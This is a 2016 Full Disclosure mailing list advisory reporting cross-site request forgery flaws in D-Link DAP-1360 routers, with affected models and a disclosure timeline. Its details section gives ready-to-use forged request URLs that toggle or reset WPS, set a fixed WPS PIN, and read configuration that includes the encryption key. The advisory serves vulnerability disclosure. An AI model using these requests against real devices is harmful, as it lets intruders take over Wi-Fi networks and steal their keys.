Full Disclosure mailing list archives
New CSRF vulnerabilities in D-Link DAP-1360
From: "MustLive" <mustlive () websecurity com ua>
Date: Wed, 30 Nov 2016 23:43:11 +0200
Hello list!After previous Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities, here are new ones. There are Cross-Site Request Forgery vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router).
------------------------- Affected products: -------------------------Vulnerable is the next model: D-Link DAP-1360, Firmware 1.0.0. This model with other firmware versions also must be vulnerable.
D-Link should fix these vulnerabilities in the next version of firmware, as they answered me in October 2014.
I tested model DAP-1360/B/D1B. There are three models of DAP-1360: DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes, it's EOL device.DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link should possibly fix the vulnerabilities in new firmware. DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware possibly includes fixes for the vulnerabilities.
---------- Details: ---------- CSRF (WASC-09): In section Wi-Fi - WPS it's possible to change parameter WPS Enable: Turn on: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:true}} Turn off: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:false,%22WscConfigured%22:true}} Reset to unconfigured: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:false}}It's possible to read configuration in Information - Refresh. From this page it's possible to read data about Encryption key via XSS attack (it will work even at turned off WPS):
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_config_action=1&res_config_id=35&res_struct_size=0 It's possible to change method in Connection - WPS Method: PBC: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PBC%22}} PIN: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PIN%22,%22WscPin%22:%2211111111%22}} ------------ Timeline: ------------ 2014.05.22 - informed developers about vulnerabilities in D-Link DAP-1360.2014-2016 - informed developers about multiple vulnerabilities in this and other D-Link devices.
2016.01.27 - disclosed at my site (http://websecurity.com.ua/8120/). Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- New CSRF vulnerabilities in D-Link DAP-1360 MustLive (Dec 01)